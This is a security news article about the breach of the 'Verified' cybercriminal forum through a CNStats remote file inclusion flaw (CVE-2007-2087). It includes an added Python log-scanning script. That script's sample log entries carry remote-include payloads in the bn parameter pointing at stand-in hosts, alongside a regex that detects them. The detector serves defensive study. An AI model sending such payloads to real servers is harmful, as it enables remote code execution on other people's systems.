
Verified, one of the largest communities of Eastern European cybercriminals, was hacked

One of the largest communities of Eastern European cybercriminals, “Verified”, was hacked, and more than 18,894 bad actors were exposed after several hours.

According to sources at IntelCrawler, a cyberintelligence firm from Los Angeles, the largest community of Eastern European cybercriminals, “Verified”, was hacked several hours ago.

The hackers hit the online community late Tuesday, stealing member information and login credentials from the site’s forum database. It is still not confirmed, but the attackers could be members of a rival cyber gang that manages a crime forum.

IntelCrawler is one of the most interesting players in the cyberintelligence landscape. A few weeks ago they discovered a Russian-speaking group offering bulletproof hosting in Syria and Lebanon, and just yesterday I published a post on another analysis by its specialists, on VSAT terminal vulnerabilities.

The event is considered serious in the underground communities: security and anonymity are fundamental requirements for the sales model known as fraud-as-a-service, and specialized forums like Verified offer products and services to criminal gangs to support their illegal activities. The Verified forum specializes in online banking and financial fraud against organizations in the US, UK and Australia.

«It is a good example that there is insecurity in cybercriminal communities too, besides the resources they prefer to hack. Sometimes it helps investigators to find bad actors' profiles and to arrest them, doing deep e-crime intelligence» – commented IntelCrawler researchers.

The Verified data breach exposed all the attachments uploaded to the forum since 2011, and allowed the download of the MySQL database with all the cybercriminals' user accounts and credentials.

The attack was very smart: the hackers exploited a vulnerability in a third-party web application used for traffic and statistics monitoring, «CNStats STD 4.3» (CVE-2007-2087).

“Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.” is the description of the vulnerability from the National Vulnerability Database.
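One way to look for attempts against this flaw in web server access logs, as an added example (not from the original article or from IntelCrawler): it flags requests to the two scripts named in the description whose bn parameter carries a URL. The log entries, the /cnstats/ install path and the example.test hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts and parameter named in the CVE-2007-2087 description.
TARGET_SCRIPTS = ("/reports/who_r.php", "/reports/who_s.php")
PARAM = "bn"
# A value starting with a URL scheme (http://, ftp://, php://, ...) or data:
# means a remote include was requested instead of a normal value.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)
# Client, request target and status from a common/combined log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample entries: documentation IPs, example.test hosts,
# assumed /cnstats/ install path.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2014:10:00:00 +0000] "GET /cnstats/reports/who_r.php'
    '?bn=http%3A%2F%2Fremote.example.test%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2014:10:00:05 +0000] "GET /cnstats/reports/who_s.php'
    '?bn=3 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2014:10:00:09 +0000] "GET /cnstats/reports/WHO_S.php'
    '?bn=FTP://files.example.test/a HTTP/1.1" 403 199',
    '198.51.100.4 - - [01/Jan/2014:10:00:12 +0000] "GET /index.php'
    '?bn=http://example.test/ HTTP/1.1" 200 900',
]

def find_rfi_attempts(lines):
    """Return one record per request that passes a URL in bn to a target script."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        url = urlsplit(target)
        # Normalise the path: decode %xx, collapse repeated slashes, ignore case.
        path = re.sub(r"/{2,}", "/", unquote(url.path)).lower()
        if not path.endswith(TARGET_SCRIPTS):
            continue
        # parse_qs percent-decodes values, so encoded URLs are caught too.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if REMOTE_VALUE.match(value):
                hits.append({"client": client, "script": path,
                             "bn": value, "status": int(status)})
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Hits matter most on hosts that meet the preconditions in the description: register_globals enabled and the application's .htaccess not recognized.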

 

The database was uploaded to Sendspace and, according to operative information, those responsible for the attack are the owners of another cybercriminal forum.

Taking a closer look at the database dump, it is possible to find the names of popular cybercriminals, including the famous spammer “SEVERA”, former partner of Alan Ralsky, arrested by US LEA. “Severa” is also widely known as a spammer who had one of the first spam services on the famous underground forum “Carberplant”, closed by LEA quite a long time ago. On January 8th, 2014 the Ukrainian SBU announced the arrest of the hacker “4×4” (UA); “4×4” was also a member of the hacked Verified forum, as were other famous cybercriminals such as Zoomer and KrenJo (very famous dumps sellers from Eastern Europe).

“4×4”: “Aren’t you working with OPTIVA trojan? If – yes, there is large deal for it”, states one of the translated, extracted private messages. The OPTIVA trojan is one of the private banking trojans they used for online-banking theft.
By the way, Zoomer was mentioned in the New York Times in 2005, and by RSA as well, as a very serious dumps seller.

Some of the user accounts are old: they were created in 2005, when the community had just been created. In terms of security, most of the users are using e-mail accounts in various jurisdictions and “safe-mail.net”.

The community, born in 2005, became very popular for trading new exploit kits; Paunch, the author of the “Blackhole” exploit kit, was one of the advertisers there.

Pierluigi Paganini

(Security Affairs –  Verified forum, cybercrime)
